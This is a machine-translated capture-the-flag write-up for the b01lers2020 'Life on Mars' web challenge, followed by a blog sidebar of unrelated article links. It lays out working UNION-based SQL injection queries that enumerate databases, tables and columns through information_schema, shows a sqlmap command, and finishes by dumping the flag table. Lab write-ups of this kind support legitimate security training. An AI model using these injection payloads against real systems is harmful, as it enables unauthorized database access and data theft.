当前位置:网站首页>[b01lers2020]Life on Mars
[b01lers2020]Life on Mars
2022-08-03 22:03:00 【New Reading of the Classic of Tea.】
[b01lers2020]Life on Mars
A general look at the points is not important, f12 found nothing, and the packet capture found GET /query?search=&amazonis_planitia&{}&_=1659321817406
strong>, click on different titles, the content of amazonis_planitia will also change with itAttempt to enter the page it appears on this page
Find a lot of data, try union query: /query?search=amazonis_planitia union select 1,2, find that there areecho
Check the library: /query?search=amazonis_planitia union select version(),database()
Check the table: /query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'
After checking, I found that the echoed things are the titles of the first page, query the fields of the table: /query?search=amazonis_planitia union select1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia', nothing special
Use the sqlmap tool to scan it
sqlmap download: sqlmap: automatic SQL injection and database takeover tool
python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs
I found that there are three databases in the modified webpage, and you can check it yourself: /query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA, there are indeed three databases
I have already queried aliens and found nothing, continue to query the table of alien_code: /query?search=amazonis_planitia union select 1,group_concat(table_name)from information_schema.tables where table_schema='alien_code'
Query the fields of the code table: /query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'
Check the content: /query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code
This is the end, let's spread the flowers
边栏推荐
猜你喜欢
[kali-vulnerability exploitation] (3.2) Metasploit basics (on): basic knowledge
ValidationError: Progress Plugin Invalid Options
IO线程进程->线程同步互斥机制->day6
XSS holes emersion
Diazo Biotin-PEG3-DBCO|重氮化合物修饰生物素-三聚乙二醇-二苯并环辛炔
CAS:1192802-98-4_UV 裂解的生物素-PEG2-叠氮
嵌入式系统:概述
21天打卡挑战学习MySQL——《Window下安装MySql》第一周 第三篇
DO280管理和监控OpenShift平台--资源限制
2022年全国职业院校技能大赛网络安全 B模块 B-1任务一:主机发现与信息收集 国赛原题
随机推荐
LVS负载均衡集群
CAS: 773888-45-2_BIOTIN ALKYNE_生物素-炔基
Cisco ike2 IPSec配置
XSS漏洞复现
StoneDB 助力 2022 开放原子全球开源峰会
今晚直播 | 8.2-8.4 与你聊聊开源与就业那些事!
[kali-vulnerability scanning] (2.1) Nessus lifts IP restrictions, scans quickly without results, and plugins are deleted (middle)
start with connect by 实现递归查询
【Unity3D】Tank对战
【Odoo】硬核组件开发,全文没一句废话~
如何设计 DAO 的 PoW 评判标准 并平衡不可能三角
Shell编程的条件语句
YOLO之父宣布退出CV界,坦言无法忽视自己工作带来的负面影响
gtk实现图片旋转
CAS: 773888-45-2_BIOTIN ALKYNE_Biotin-alkynyl
软考系统分析师备考经验分享:论持久战
IDaaS 是什么?一文说清它的价值
数据一致性:双删为什么要延时?
nxp官方uboot移植到野火开发板PRO(无任何代码逻辑的修改)
XSS线上靶场---prompt